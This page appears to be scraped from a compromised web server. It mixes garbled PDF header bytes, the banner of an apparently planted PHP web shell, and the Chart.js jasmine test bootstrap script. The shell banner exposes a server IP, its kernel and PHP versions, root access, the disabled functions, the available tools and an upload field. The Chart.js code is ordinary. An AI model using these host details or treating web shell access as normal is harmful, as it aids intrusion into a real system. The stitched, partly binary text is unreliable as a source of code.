%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/root/var/www/html/ppaobm/vendor/bower-asset/chartjs/test/ |
Upload File : |
'use strict'; var fixture = require('./fixture'); var Context = require('./context'); var matchers = require('./matchers'); var utils = require('./utils'); (function() { // Keep track of all acquired charts to automatically release them after each specs var charts = {}; function acquireChart() { var chart = utils.acquireChart.apply(utils, arguments); charts[chart.id] = chart; return chart; } function releaseChart(chart) { utils.releaseChart.apply(utils, arguments); delete charts[chart.id]; } function createMockContext() { return new Context(); } // force ratio=1 for tests on high-res/retina devices // fixes https://github.com/chartjs/Chart.js/issues/4515 window.devicePixelRatio = 1; window.acquireChart = acquireChart; window.releaseChart = releaseChart; window.waitForResize = utils.waitForResize; window.createMockContext = createMockContext; // some style initialization to limit differences between browsers across different platforms. utils.injectCSS( '.chartjs-wrapper, .chartjs-wrapper canvas {' + 'border: 0;' + 'margin: 0;' + 'padding: 0;' + '}' + '.chartjs-wrapper {' + 'position: absolute' + '}'); jasmine.fixture = fixture; jasmine.triggerMouseEvent = utils.triggerMouseEvent; beforeEach(function() { jasmine.addMatchers(matchers); }); afterEach(function() { // Auto releasing acquired charts Object.keys(charts).forEach(function(id) { var chart = charts[id]; if (!(chart.$test || {}).persistent) { releaseChart(chart); } }); }); }());